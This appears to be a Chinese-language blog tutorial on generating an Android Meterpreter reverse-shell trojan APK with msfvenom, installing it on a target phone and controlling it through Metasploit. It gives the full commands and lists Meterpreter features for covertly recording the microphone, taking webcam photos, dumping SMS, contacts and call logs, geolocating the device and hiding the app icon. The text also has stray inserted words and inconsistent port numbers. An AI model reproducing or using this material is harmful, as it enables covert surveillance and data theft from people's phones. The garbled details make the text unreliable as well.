中华人民共和国网络安全法警告:请勿用于非法用途,后果自负!android
0.环境
- 虚拟机 KaliLinux
- 手机 Redmi 6A
- 同一局域网下
1.查看控制端IP
ifconfig
即192.168.xx.xxxweb
2.生成木马程序
>>>msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.xx.xxx lport=9999 R>/home/hugboy/桌面/Share/hugboyMsf.apk
-设置监听端主机lhost=192.168.xx.xxx
-设置监听端主机端口lhost=5555
-保存到指定目录R>/home/hugboy/桌面/hugboyMsf.apk
自动生成了一个10179 bytes 大小的程序
sql
3.把hugboyMsf.apk安装到目标手机并运行
1).如何让虚拟机与主机数据分享,进而发送到手机上安装?
安装VMtools直接拖到本地桌面
Apt update
Apt install open-vm-tools-desktop fuse
Reboot
重启生效
shell
2).发送到手机安装,忽略警告,点击继续。。。
4.打开metasploit工具
5.设置payload
use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.xx.xxx set LPORT 5555
exploit
6.显示meterpreter>说明链接成功
经常使用命令
+麦克风
-record_mic 从麦克风huhugb录制音频X秒
-h 帮助
-d 记录秒数
-F 音频保存路径,默认 HOME/xxxx.wav
-p 自动播放捕获的音频
+webcam_list 列出手机摄像头个数
+webcam_snap 从指定摄像头拍摄照片
-h 帮助
-I 选择要使用的摄像头
-p 图片路径,默认HOME/xxxx.jpeg
-q 图片质量,默认为50
-v 自动查看图片
+webcam_chat 开始视频聊天
+webcam_stream 从摄像拍摄视频
api
演示
列出设备的摄像头安全
webcma_list
选择第一个摄像头(后置摄像头)拍照网络
webcam_snap -i 1
所有命令
help
Stdapi: File system Commands
Command Description ------- ----------- cat Read the contents of a file to the screen cd Change directory checksum Retrieve the checksum of a file cp Copy source to destination dir List files (alias for ls) download Download a file or directory edit Edit a file getlwd Print local working directory getwd Print working directory lcd Change local working directory lls List local files lpwd Print local working directory ls List files mkdir Make directory mv Move source to destination pwd Print working directory rm Delete the specified file rmdir Remove directory search Search for files upload Upload a file or directory
Stdapi: Networking Commands
Command Description ------- ----------- ifconfig Display interfaces ipconfig Display interfaces portfwd Forward a local port to a remote service route View and modify the routing table
Stdapi: System Commands
Command Description ------- ----------- execute Execute a command getuid Get the user that the server is running as localtime Displays the target system's local date and time pgrep Filter processes by name ps List running processes shell Drop into a system command shell sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
Command Description ------- ----------- screenshare Watch the remote user's desktop in real time screenshot Grab a screenshot of the interactive desktop
Stdapi: Webcam Commands
Command Description ------- ----------- record_mic Record audio from the default microphone for X seconds webcam_chat Start a video chat webcam_list List webcams webcam_snap Take a snapshot from the specified webcam webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
Command Description ------- ----------- play play a waveform audio file (.wav) on the target system
Android Commands
Command Description ------- ----------- activity_start Start an Android activity from a Uri string check_root Check if device is rooted dump_calllog Get call log dump_contacts Get contacts list dump_sms Get sms messages geolocate Get current lat-long using geolocation hide_app_icon Hide the app icon from the launcher interval_collect Manage interval collection capabilities send_sms Sends SMS from target session set_audio_mode Set Ringer Mode sqlite_query Query a SQLite database from storage wakelock Enable/Disable Wakelock wlan_geolocate Get current lat-long using WLAN information
Application Controller Commands
Command Description ------- ----------- app_install Request to install apk file app_list List installed apps in the device app_run Start Main Activty for package name app_uninstall Request to uninstall application